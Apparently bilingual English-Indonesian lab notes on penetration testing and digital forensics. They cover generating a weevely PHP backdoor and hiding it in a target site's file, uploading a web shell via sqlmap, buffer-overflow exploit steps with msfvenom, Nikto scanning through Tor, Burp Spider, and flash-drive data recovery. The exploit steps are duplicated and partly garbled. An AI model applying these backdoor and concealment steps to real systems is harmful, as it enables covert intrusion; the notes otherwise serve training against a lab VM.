Make Backdoor with Weevely

1.Once backdoor.php we upload to the web, now we will try to insert a php script that we make with weevely into the web and hide it in php files belonging to the target web.
(Setelah backdoor.php kita upload ke web, sekarang kita akan mencoba untuk memasukkan script php yang kita buat dengan weevely ke web dan menyembunyikannya di file php milik web sasaran)
#weevely generate 1234 pintu.php enter
#ls

2. Copy the script that is in the php file that we created earlier in the php file that is in the target web.
(Salin script yang ada di file php yang kita buat sebelumnya di file php yang ada di web sasaran)
 I will try to insert the script in the view_source_all.php file in the web directory.  
(Saya akan mencoba untuk memasukkan script di file view_source_all.php di direktori web.)
# Weevely http: //url ipaddres target / name backdoor password

Digital Forensic

Digital forensics is the science of analyzing digital evidence. Digital evidence is extracted from the electronic evidence such as Personal Computers, mobilephone, notebook, server, any technological tool that has the storage media and can be analyzed.

(Digital forensik adalah ilmu yang menganalisa barang bukti digital. Barang bukti digital merupakan hasil ekstrak dari barang bukti elektronik seperti Personal Komputer, mobilephone, notebook, server, alat teknologi apapun yang mempunyai media penyimpanan dan bisa dianalisa.)

Steps of digital forensic

1. Identification

    means that we chose the thing will identificate with forensic. Example : PC, mobilephone, notebook, flasdisck, server.

2. Preservation

   -chain of custody (to ensure that file when it last changed the owner)

   -labeling

   -imaging/clone

3. Examination

4. Analysis

5. Reporting/produck

The first step is check the position of flasdisk. The goal is to ensure that the data which we will identification. do not let any of the data format the pc itself. If Flasdisck previously been formatted with verascrypt it must be in the format.

1. To find the position of flasdisk which will we identification, open terminal

  #fdisk -l or dmesg enter

2. To reformat the flasdisk from verascypt position to normal position
 #cfdisk /dev/sdb1enter
    -delete
    -new
    -primary
    -write
    -type : yes
    -quite
 #mkfs.fat /dev/sdb1 enter
from command the flasdisk has reformated.

3. Let start to identification the forensic of flasdisk to know what data has been erased and can be read back. (manual ways)
 #fdisk -l
 #testdisk /dev/sdb
   -process
   -intel
   -analisis
   -quick search
   -continue
   -pilih P: list file

red colour : Data that has been erased before and will be in recovery
white colour : Data is still stored in flasdisk 
to check the file has recovered search in root/home directory

4. The next way is an automatic recovery.
#fdisk -l
#photorec /dev/sdb enter
  - enter
previous data will be erased recovery back and immediately stored in a single folder in the home directory namely recup_dir 

 
 

 

The Function of Veracrypt

Veracrypt in is one of the tools of the linux created as data security and data storage device itself. By Veracrypt we can divide into somes Flasdisk partitions and sort out which ones will be completed with the security Veracrypt where unnecessary.

In safeguards against is file one of them in the process of sending data via email ATW gmail. Where no such thing as a public key and secreat key. The public key serves as a device where others can send encrypted data. Secreat key functions as a device in which only concerned that may lead to the data or the storage device if the object is lost.

Steps of exploitation development

1. Make sure Fuzzing and application error

2. Debug the application and ensure the highest EIP registers by the data that we send

3. Calculate how much of a buffer of bytes to which overwrite EIP register using pattern_crete and pattern_offset

4. Looking for locations for placing the payload (ESP registers in this case, because it took stricken by a buffer which we presume)

5. Search for the address that directs us to the payload For placed on the register of EIP (in this case the address of JMP / CALL ESP)

6. Run fuzzer that contains the address of

2. If the EIP register stricken with the data by the data we send, count how many bytes of the EIP register stricken by using pattern_create and pattern_offset

3. Find the address of JMP ESP / ESP CALL to co-opt the EIP register to STACK / ESP

4. Run Fuzzer and make sure the application leads to the ESP

5. Creating a Simple Payload use msfvenom

1. Lakukan Fuzzing dan pastikan aplikasi error

2. Debug aplikasi dan pastikan register EIP tertinggi oleh data yg kita kirim

3. Hitung byte ke berapa dari buffer yg menimpa register EIP menggunakan pattern_crete dan pattern_offset

4. Mencari lokasi utk meletakan payload (dalam kasus ini register ESP, karena ikut tertimpa oleh buffer yg kita kira)

5.  Mencari alamat yang mengarahkan kita ke payload utk diletakan pada register EIP ( dalam kasus ini alamat dari JMP/CALL ESP )

6. Jalankan fuzzer yang berisi alamat dari

2. Jika register EIP tertimpa dengan data oleh data yang kita kirim, hitung ke byte berapa register EIP tertimpa dengan menggunakan pattern_create dan pattern_offset

3. Cari alamat JMP ESP/CALL ESP utk mengarahkan register EIP ke STACK/ESP

4. Jalankan Fuzzer dan pastikan aplikasi mengarah ke ESP

5. Membuat Simple Payload menggunakan msfvenom
 
            _ _ _ _ _ _ _ _ _ _ _
           I                           I
=============================
DATAA *...?               I  EIP  I   PAYLOAAADD
==============================
                                       I_ _ _ _ _ _ _ _I
                                 jmp/call esp

Upload Backdoor using Sqlmap (membuat Backdoor dengan Sqlmap)

Before we go to upload backdoor with sqlmap, we must understand it that step at this stage of vulnerability (to get into the database and open password from the server) we have carried out. Then We can move to a new stage by using the backdoor Upload sqlmap.
(sebelum kita melangkah untuk upload backdoor dengan sqlmap, kita harus fahami bahwa langkah pada tahap vulnerability (sampai masuk ke dalam database dan membuka password dari server) telah kita laksanakan. Baru kita dapat melangkah ke tahap Upload backdoor dengan menggunakan sqlmap) 
Cat: Target adalah Metasploit yang ada di dalam virtualbox

1.Open Terminal and make command.
 #cd /usr/share/webshell/php/ enter
 #ls
 #cp php-backdoor.php /root/ enter
 #ls

2.Then back to the terminal at the stage we have entered into the data base of the target. 

We need to remember to upload backdoor through sqlmap stage we carried out, until we actually exist in the target server is one of them into the database and if the database has a password then we have to crack the password we have just carried out upload backdoor with sqlmap.

(Perlu kita ingat untuk tahap upload backdoor melalui sqlmap ini kita laksanakan sampai kita benar-benar ada dalam server target salah satunya masuk ke database dan apabila database tersebut memiliki password maka kita harus crack password tersebut baru kita laksanakan upload backdoor dengan sqlmap)

Scan using Nikto (Scan dengan Nikto )

1.Using Nikto for scan is very specific so you must first activate Tor on terminal
(Scan dengan menggunakan Nikto sangat spesifik sehingga aktifkan terlebih dahulu Tor pada terminal)
#service tor enter

2.To open Nikto application can from the Applications of Linux and terminal.
(Untuk membuka aplikasi Nikto bisa dari Applications Linux dan terminal)
*Applicatioan: kali linux--web applications--web vulnerability scanner--nikto
*Terminal      : nikto enter

3.To run a scan command
(Untuk menjalankan perintah scan) 
#nikto -host web/alamat url target enter

Scan with SPIDER on Burp Suite. (Scan dengan SPIDER pada Burp Suite )

The function of Spider device is as crawlers will actively and passively doing crawling on the web application to acquire web page data, directories, and even to submit the form and get variables.
(Fungsi dari perangkat Spider ini sebagai crawler yang akan secara aktif dan pasif me- lakukan crawling terhadap web aplikasi untuk mendapatkan data halaman web, direktori, bahkan melakukan submit form dan mendapatkan variabel.)

1. Open web multillidae which displays the login
    (Buka web multillidae yg menampilkan login)

2. Open Burp Suite and enable proxy burp suite. Then fill the log that appears on bupr suite.
(Buka Burp Suite dan aktifkan proxy burp suite. Kemudian isi login sehingga tampil pada bupr suite)

3.Click Proxy - forward - target so it appears the target website. then point to the target. click on right and select spider this branch.
(Klik Proxy--forward--target maka muncul website target. kemudian arahkan kursor ke target. klik kanan pilih spider this branch)

4.To see the results of the scan click on one of the files that will be scanned and click response there will be a description of the file.
(Untuk melihat hasil dari scan klik pada salah satu file yg akan di scan dan klik response maka akan ada keterangan dari file tsb)